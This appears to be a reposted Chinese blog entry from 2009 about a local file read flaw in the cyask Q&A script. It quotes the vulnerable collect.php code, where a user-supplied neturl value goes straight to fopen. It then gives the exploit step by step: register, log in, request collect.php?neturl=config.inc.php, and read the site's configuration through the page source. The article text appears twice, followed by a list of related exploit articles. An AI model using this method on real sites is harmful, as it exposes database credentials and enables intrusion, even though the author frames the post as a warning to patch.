cyask的一个本地读文件的漏洞利用
2009-06-20 18:38
330 查看
昨天在晚上看到了一个这样的文章,却没有人说利用的方法,自己研究了一下,原来这么简单。
下面是这篇文章的内容。
下午帮同事看一个站,DZ的论坛,该补的都补了,咱也没圈day
然后逛了下有个仿百度知道的程序在上面,和DZ整合了,原以为也是Dz开发的,估计也没啥问题
下来看代码,看到collect.php
-------------------------------
else
{
/*
检查网址
*/
$url=get_referer();
$neturl=empty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);
$collect_url=empty($neturl) ? $url : $neturl;
$contents = '';
if($fid=@fopen($collect_url,"r"))
{
do
{
$data = fread($fid, 4096);
if (strlen($data) == 0)
{
break;
}
$contents .= $data;
}
while(true);
fclose($fid);
}
else
{
show_message('collect_url_error', '');
exit;
}
----------------------------------
害人啊,本来还挺安全的一个站,整合个毛呃……
找一个cyask的网站,在其上面注册,然后登录后,输入http://www.×××.com/collect.php?neturl=config.inc.php 在内容快照里面点右键,点查看源文件,哇,什么都看到了,我只是说出来利用方法,希望大家尽早补漏洞。一切损失与本人无关哦!
下面是这篇文章的内容。
下午帮同事看一个站,DZ的论坛,该补的都补了,咱也没圈day
然后逛了下有个仿百度知道的程序在上面,和DZ整合了,原以为也是Dz开发的,估计也没啥问题
下来看代码,看到collect.php
-------------------------------
else
{
/*
检查网址
*/
$url=get_referer();
$neturl=empty($_POST['neturl']) ? trim($_GET['neturl']) : trim($_POST['neturl']);
$collect_url=empty($neturl) ? $url : $neturl;
$contents = '';
if($fid=@fopen($collect_url,"r"))
{
do
{
$data = fread($fid, 4096);
if (strlen($data) == 0)
{
break;
}
$contents .= $data;
}
while(true);
fclose($fid);
}
else
{
show_message('collect_url_error', '');
exit;
}
----------------------------------
害人啊,本来还挺安全的一个站,整合个毛呃……
找一个cyask的网站,在其上面注册,然后登录后,输入http://www.×××.com/collect.php?neturl=config.inc.php 在内容快照里面点右键,点查看源文件,哇,什么都看到了,我只是说出来利用方法,希望大家尽早补漏洞。一切损失与本人无关哦!
相关文章推荐
- opera9.52使用ajax读取本地文件漏洞进一步利用
- 求如何利用struts2从本地解析一个cvs文件并显示在页面上
- PHP本地文件包含漏洞环境搭建与利用
- PHP本地文件包含(LFI)漏洞利用
- PHP本地文件包含(LFI)漏洞利用
- PHP本地文件包含(LFI)漏洞利用
- 利用OpenCV读入一个彩色视频文件并以灰度格式输出
- 用Java实现的一个本地文件浏览器
- 利用R将本地数据文件读入redis数据库中
- Git Bash怎么把本地的一个文件传送到github的操作方法
- redhat7本地利用ping拿root漏洞详析 添加书签
- PHP利用文件锁实现只运行一个实例
- 如何利用openSsl来计算一个文件的md5值?
- 生成一个本地文件, 生成html
- curl是一个利用URL规则在命令行下工作的文件传输工具。
- 使用了博客园的备份后得到一个xml文件,不知道有没有css或者xslt文件可以在本地阅读文章,在网上找了半天也没有找到解决办法,难道要自己写?
- 实战演示黑客如何利用SQL注入漏洞攻破一个WordPress网站
- PHP文件包含漏洞原理分析和利用方法
- 利用Lua读写本地文件
- PHP中 LFI Local File Include,本地文件包 漏洞